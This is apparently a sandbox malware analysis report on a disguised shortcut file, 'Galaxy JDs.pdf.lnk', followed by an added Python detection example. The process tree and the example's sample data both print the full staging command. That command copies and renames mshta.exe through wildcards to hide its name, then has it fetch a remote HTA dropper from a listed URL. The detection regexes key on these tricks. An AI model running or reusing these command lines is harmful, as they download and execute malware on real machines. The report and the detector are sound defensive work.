Analysis

  • max time kernel
    394s
  • max time network
    867s
  • platform
    windows10-1703_x64
  • resource
    win10-20220901-en
  • resource tags

    arch:x64, arch:x86, image:win10-20220901-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    26-09-2022 11:25

General

  • Target

    Galaxy JDs.pdf.lnk

  • Size

    363KB

  • MD5

    8878ee5d935facff0e04370324118c60

  • SHA1

    e09eda6f9ee4d2e30e239813e87423472d893396

  • SHA256

    3b70c3ebffcfd6a97859f8d9e5a31f6902756e23fd6688ca7c7446d24ec76d9d

  • SHA512

    e9e8e82126ee4e4a87b39ce60f48155724a8577c95e664de2e3d3c05e70f02bf30454d023832a58560befb695c359dd244923e929ded4414f9d0f93061343e46

  • SSDEEP

    6144:pPISi7Naj5ng6erydYtQfBpeSLh1J7qLESnJmlfYHeaSuNcVD8payTq6Z:pwSiKeryu2fBpe+R7q5JmlJui6pay2e

Score
10/10

Malware Config

Extracted

  • Language
    hta
  • Source
    URLs
  • hta.dropper
    https://fs.digiboxes.us/yq7dpQeWf6Bbu6jZsRiT8UdhrIB08fQGBxDPNulbHbg=

Signatures

  • Blocklisted process makes network request (4 IoCs)
  • Enumerates physical storage devices (1 TTPs)

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of WriteProcessMemory (4 IoCs)

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Galaxy JDs.pdf.lnk"
    PID:4680
    • Suspicious use of WriteProcessMemory
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /q /c type C:\Windows\system32\msh*.exe>C:\Users\Public\msh&ren C:\Users\Public\* *ta.exe&for %i IN (C:\Users\Public\ms*.exe) DO start /b %~ni "https://fs.digiboxes.us/yq7dpQeWf6Bbu6jZsRiT8UdhrIB08fQGBxDPNulbHbg="
      PID:4904
      • Suspicious use of WriteProcessMemory
      • C:\Windows\system32\mshta.exe
        mshta "https://fs.digiboxes.us/yq7dpQeWf6Bbu6jZsRiT8UdhrIB08fQGBxDPNulbHbg="
        PID:4176
        • Blocklisted process makes network request
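The process tree above is the whole payload. The command the shortcut resolves to is the cmd.exe line at PID 4904: it copies a system binary with `type C:\Windows\system32\msh*.exe>C:\Users\Public\msh` (no copy.exe or xcopy.exe, and the literal string mshta never appears in the command line), gives the extension-less copy an .exe name with the `ren ... *ta.exe` mask, and launches it through `for ... DO start /b %~ni`, where `%~ni` expands to the matched file name without path or extension. That is why the child at PID 4176 is a plain `mshta "https://..."` fetching the hta.dropper URL listed under Malware Config. What follows is an added detection example, not part of the sandbox report: it encodes the three staging tricks and the mshta-with-remote-URL rule as regexes over Sysmon EventID 1-style process-creation records. The records are constructed for the example; only the three command lines and PIDs come from the tree, and the field names and the two benign events are assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed process-creation records (Sysmon EventID 1-like shape).  The
# three malicious command lines and PIDs are copied from the report; the
# parent PID 1000, the field names and the two benign events are made up.
SAMPLE_EVENTS = [
    {"pid": 4680, "ppid": 1000, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'cmd /c "C:\Users\Admin\AppData\Local\Temp\Galaxy JDs.pdf.lnk"'},
    {"pid": 4904, "ppid": 4680, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /q /c type C:\Windows\system32\msh*.exe'
                r'>C:\Users\Public\msh&ren C:\Users\Public\* *ta.exe'
                r'&for %i IN (C:\Users\Public\ms*.exe) DO start /b %~ni '
                r'"https://fs.digiboxes.us/yq7dpQeWf6Bbu6jZsRiT8UdhrIB08fQGBxDPNulbHbg="'},
    {"pid": 4176, "ppid": 4904, "image": r"C:\Windows\system32\mshta.exe",
     "cmdline": r'mshta "https://fs.digiboxes.us/yq7dpQeWf6Bbu6jZsRiT8UdhrIB08fQGBxDPNulbHbg="'},
    # Benign noise (constructed): a local HTA and an ordinary cmd /c.
    {"pid": 5000, "ppid": 1000, "image": r"C:\Windows\system32\mshta.exe",
     "cmdline": r'mshta C:\Program Files\Vendor\setup.hta'},
    {"pid": 5001, "ppid": 1000, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'cmd /c dir C:\Users\Public'},
]

# type <wildcard .exe under \Windows\> > <destination>: copies a system binary
# with a redirect instead of copy.exe/xcopy.exe.
TYPE_COPY_RE = re.compile(
    r"\btype\s+(?P<src>[^&|>]*\\windows\\[^&|>]*\*[^&|>]*\.exe)\s*>\s*(?P<dst>[^&|>\s]+)",
    re.IGNORECASE)
# ren <dir>\* *<suffix>.exe: gives the extension-less copy an .exe name again.
REN_MASK_RE = re.compile(r"\bren(?:ame)?\s+[^&|]*\\\*\s+\*[^&|\s]*\.exe", re.IGNORECASE)
# for %v in (<glob>) do start /b %~nv: launches the copy by bare name, so the
# staging command line never has to spell out the binary's real name.
FOR_START_RE = re.compile(
    r"\bfor\s+%(?P<v>\w)\s+in\s*\([^)]*\)\s*do\s+start\s+/b\s+%~n(?P=v)\b",
    re.IGNORECASE)
URL_RE = re.compile(r'https?://[^\s"]+', re.IGNORECASE)


def staging_indicators(cmdline):
    """Indicators of the type-copy / wildcard-rename / for-start staging pattern."""
    ind = {}
    m = TYPE_COPY_RE.search(cmdline)
    if m:
        ind["type_copy"] = (m.group("src"), m.group("dst"))
    if REN_MASK_RE.search(cmdline):
        ind["wildcard_rename"] = True
    if FOR_START_RE.search(cmdline):
        ind["for_start_launch"] = True
    urls = URL_RE.findall(cmdline)
    if urls:
        ind["urls"] = urls
    return ind


def mshta_remote_url(image, cmdline):
    """Return the http(s) URL handed to mshta.exe, or None for local HTAs."""
    if not image.lower().endswith("\\mshta.exe"):
        return None
    m = URL_RE.search(cmdline)
    return m.group(0) if m else None


def detect(events):
    """Run both rules and link an mshta child back to the cmd.exe that staged it."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in events:
        ind = staging_indicators(ev["cmdline"])
        # Require two of the three tricks so a lone `type` redirect does not fire.
        if sum(k in ind for k in ("type_copy", "wildcard_rename", "for_start_launch")) >= 2:
            findings.append({"rule": "lolbin_staged_via_type_ren", "pid": ev["pid"], **ind})
        url = mshta_remote_url(ev["image"], ev["cmdline"])
        if url:
            parent = by_pid.get(ev["ppid"])
            parent_urls = staging_indicators(parent["cmdline"]).get("urls", []) if parent else []
            findings.append({"rule": "mshta_remote_url", "pid": ev["pid"], "url": url,
                             "staged_by_parent": url in parent_urls})
    return findings


def network_iocs(findings):
    """Hostnames to block, collected from every URL in the findings."""
    hosts = set()
    for f in findings:
        for u in f.get("urls", []) + ([f["url"]] if "url" in f else []):
            hosts.add(urlparse(u).hostname)
    return sorted(hosts)


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for f in hits:
        print(f)
    print("block:", network_iocs(hits))
```

The staging rule deliberately keys on the shape of the command (redirect-copy, wildcard rename, `%~n` launch) rather than on the name mshta, because that name is exactly what the wildcards were chosen to hide; the mshta rule then catches the child regardless of how it was spawned, and the parent link turns two medium-confidence hits into one high-confidence chain.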

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Discovery
    System Information Discovery (T1082): 1

Downloads

  • memory/4176-118-0x0000000000000000-mapping.dmp
  • memory/4904-117-0x0000000000000000-mapping.dmp